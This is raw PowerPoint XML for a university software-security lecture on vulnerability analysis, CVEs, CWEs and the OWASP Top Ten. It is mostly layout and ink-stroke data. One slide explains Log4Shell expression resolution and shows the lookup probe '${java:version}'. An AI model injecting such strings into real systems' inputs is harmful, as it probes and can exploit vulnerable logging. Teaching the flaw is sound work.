0,0-1 0,0 0 0,2 1 0,40 14 0,-38-14 0,69 21 0,-61-20 0,0 1 0,-1 0 0,1 1 0,-1 1 0,0 0 0,0 0 0,0 1 0,18 14 0,-24-15 0,-8-4 0,-19-10 0,-28-16 0,23 12 0,0 2 0,-1 1 0,0 1 0,-1 1 0,-28-4 0,54 12 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 4 0,-5 6 0,1 0 0,0 1 0,-5 16 0,-1 1 0,-44 100 0,46-118 0,6-21 0,6-22 0,0 20 0,1 1 0,1-1 0,0 1 0,0 0 0,1 1 0,1-1 0,0 1 0,0 0 0,1 0 0,0 1 0,15-15 0,-16 19 0,-1 1 0,1 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 1 0,0 0 0,10 2 0,12 6 0,0 0 0,-1 2 0,38 20 0,-47-21 0,-17-10 0,-1 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,2 3 0,-3-3 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-2 1 0,-54 14 0,43-12 0,-41 8 0,23-6 0,0 2 0,1 1 0,-54 22 0,65-22 0,21-13 0,31-23 0,-13 13 0,-13 6 0,0 0 0,-1 0 0,0 0 0,6-14 0,-8 14 0,1 1 0,0-1 0,0 1 0,1 0 0,8-9 0,-14 17 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 2 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 2 0,-1 0-15,-1 1 0,0-1 1,0-1-1,0 1 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 0 1,-7 2-1,-8 5-1157,4-1-5654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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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16.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'9'0'0,"1"-1"0,-1-1 0,0 0 0,14-4 0,27-6 0,120 6 0,269 23 0,-337-10 0,373 47 0,-255-25 0,222 2 0,683-34 0,-812 31 0,-17-1 0,-209-29 0,52 3 0,-136 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 5 0,3 13 0,-2-1 0,0 0 0,-3 25 0,1-20 0,1 155 0,-5 116 0,-34-8 0,10-111 0,16-78 0,2-29 0,2 0 0,4 1 0,5 97 0,23 4 0,3 38 0,-5 145 0,-9 218 0,-14-356 0,2 1905 0,-2-2088 0,-2 1 0,-14 61 0,-1-4 0,13-40 0,2-20 0,0 0 0,-2 0 0,-11 32 0,16-60 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-2 0,-1 1 0,0 0 0,-4-2 0,-8-1 0,1-2 0,-1 0 0,1-1 0,-24-14 0,-5-1 0,-1 7 0,-1 2 0,-78-11 0,45 9 0,39 6 0,-8-2 0,1 2 0,-88-3 0,-650 12 0,1438-1 0,-629 2 0,0 0 0,26 7 0,27 2 0,180 29 0,-190-25 0,0-4 0,129 6 0,-152-20 0,49-8 0,-51 4 0,63-1 0,13 11 0,135-5 0,-151-10 0,51-3 0,-102 14 0,87-13 0,-116 10 0,58-10 0,163-6 0,630 21 0,-835-2 0,56-11 0,-54 5 0,45 0 0,981 5 0,-521 4 0,-423-3 0,-11-1 0,199 22 0,-258-15 0,83-1 0,-86-4 0,-1 1 0,53 10 0,-5 0 0,1-3 0,151-9 0,-94-2 0,1268 3 0,-1381-2 0,52-9 0,35-2 0,-121 13 0,259-16 0,-146 5 0,197 9 0,-152 4 0,1946-2 0,-1651 31 0,-209-8 0,-123-12 0,149 6 0,-12-5 0,8 1 0,-48-11 0,173-5 0,-274-10 0,51-1 0,-124 12 0,-36 1 0,1 0 0,0 1 0,0 0 0,0 2 0,0 0 0,20 5 0,-33-5 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 6 0,0 16 0,-2-1 0,-1 1 0,-8 34 0,6-35 0,-11 48 0,-30 82 0,-6 25 0,41-127 0,3 1 0,2 0 0,1 79 0,6-63-1365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06:53:20.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9764 13 24524,'-9764'0'0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3/26/2025</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dirty="0"/>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3/26/2025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3/26/2025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3/26/2025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3/26/2025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3/26/2025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dirty="0"/>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dirty="0"/>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dirty="0"/>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dirty="0"/>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3/26/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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customXml" Target="../ink/ink16.xml"/><Relationship Id="rId17"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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xm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customXml" Target="../ink/ink17.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customXml" Target="../ink/ink20.xml"/><Relationship Id="rId17"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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xm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customXml" Target="../ink/ink21.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customXml" Target="../ink/ink24.xml"/><Relationship Id="rId17"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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xm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customXml" Target="../ink/ink25.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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.sv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customXml" Target="../ink/ink27.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1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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29.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2021-44228"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hyperlink" Target="https://hackerone.com/bug-bounty-program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hyperlink" Target="https://cwe.mitre.org/data/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we.mitre.org/data/index.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hyperlink" Target="https://www.cve.org/CVERecord?id=CVE-2021-44228"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hyperlink" Target="https://owasp.org/www-project-top-ten/"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customXml" Target="../ink/ink31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><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customXml" Target="../ink/ink2.xml"/><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svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId19"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customXml" Target="../ink/ink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7.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink10.xml"/><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customXml" Target="../ink/ink7.xml"/><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6.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/><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customXml" Target="../ink/ink8.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customXml" Target="../ink/ink12.xml"/><Relationship Id="rId17"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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11.xm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customXml" Target="../ink/ink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551707"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ESOF 422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000" b="1" spc="-204" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advanced Software Engineering: Cyber Practices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rgbClr val="F6D28B"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6350" y="-6350"/>
            <a:ext cx="838835" cy="887730"/>
            <a:chOff x="-6350" y="-6350"/>
            <a:chExt cx="838835" cy="887730"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="F6D28B"/>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9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2663320"/>
            <a:ext cx="617728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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76201" y="5523188"/>
            <a:ext cx="9829800"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2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9E4E9B8-0CF2-48ED-6C1B-D09DC4AAA9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7F230EA-01B2-FBF2-1FBD-6C237FC3858C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="2971800"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A278247-28B4-C329-0A51-712F61958122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1566949" y="3150054"/>
            <a:ext cx="8829502"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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CVEs, CWEs, OWASP Top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91DD3D1-4893-DC63-8318-79C3A4E0763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4AB4CFA-14E0-17D3-F733-E890E922A3EC}"/>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94BCC1F6-5351-5094-FCC6-2CCD5709E00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72804717-D9FD-141A-8C5E-9359571BBE76}"/>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B42DC877-584E-81F7-5DA1-3CEF2B9FB6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD8BD7B-297A-4EC7-A6A9-45CE7B7D72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EDC0DC83-5FA8-655E-BB72-9406471F3A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A29446B8-56B2-DCFE-6B54-F61CD165E6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09C7D579-EAC0-4031-537B-D5E25F1A86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155D8E0B-5AB4-67C8-24FB-8CCD110BDBF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C8E28ED-921E-C167-3A33-8D31CC5250AB}"/>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3AFC55-FA3D-8BA7-9460-9107CB25917E}"/>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AEED1504-8639-F7B7-2AD3-A415822CE4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185D891F-EA46-EC38-FB73-C949A2DAB10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DCFA946C-1193-C2AC-5A87-FE7CD8AC10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9FBD16A1-90D7-1F91-D576-BEA274603F7E}"/>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C7B73F-206E-8A90-9F7C-8C3E362549C4}"/>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513ACC75-9D4A-70F8-9C78-0C4CD20C1737}"/>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0E4BEF8A-C667-38F3-5EA7-AB6DFBF36F50}"/>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A5B63B86-A970-9DDA-8643-EE459383DBF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D2A928E8-8CAC-7AAA-D1F7-D58302D2E8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4529111"/>
            <a:ext cx="8743950" cy="590695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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C6EB082A-0978-512C-6169-410193224E1D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6EB082A-0978-512C-6169-410193224E1D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2469743"/>
                <a:ext cx="189360" cy="18778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0F737D77-9DB7-F399-9516-3AD98ECC9A9E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3067020" y="2551215"/>
              <a:ext cx="6117480" cy="2477160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F737D77-9DB7-F399-9516-3AD98ECC9A9E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3031020" y="2515215"/>
                <a:ext cx="6189120" cy="254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4BD2372A-88DE-EF80-529F-995C4B998D48}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504540" y="4638135"/>
              <a:ext cx="3515400" cy="720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Ink 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD2372A-88DE-EF80-529F-995C4B998D48}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="468540" y="4566135"/>
                <a:ext cx="3587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EAAF112C-3C37-6DA5-15C5-42EF3238A5C5}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="490860" y="4657575"/>
              <a:ext cx="23400" cy="345600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Ink 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAF112C-3C37-6DA5-15C5-42EF3238A5C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="454860" y="4621612"/>
                <a:ext cx="95040" cy="417165"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F75ADAA-1923-1BF6-FA82-33CF22255ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4691160"/>
            <a:ext cx="1790700" cy="338040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282821"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="2828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9516E01-F7D9-E906-DE5D-5D60E1CEE82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19393" y="5529812"/>
            <a:ext cx="12014828" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Java strings that appear as an expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>${…}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> will be resolved before they are logged</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC34A6A-059B-E5C1-3B25-BBB71AB73E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825940" y="4672968"/>
            <a:ext cx="2252540" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${java:version}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="797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C7C8CD9-5E60-46E9-7CEF-A055C5146284}"/>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A5AC1828-E1B0-83A7-8697-4B58E95A4B66}"/>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66F96146-01D8-569F-8384-444E8D551339}"/>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7DFBE97F-430B-39D3-5DF4-A3FDCE1CF00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12317504-F385-7B59-A89C-AAF046F7B51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
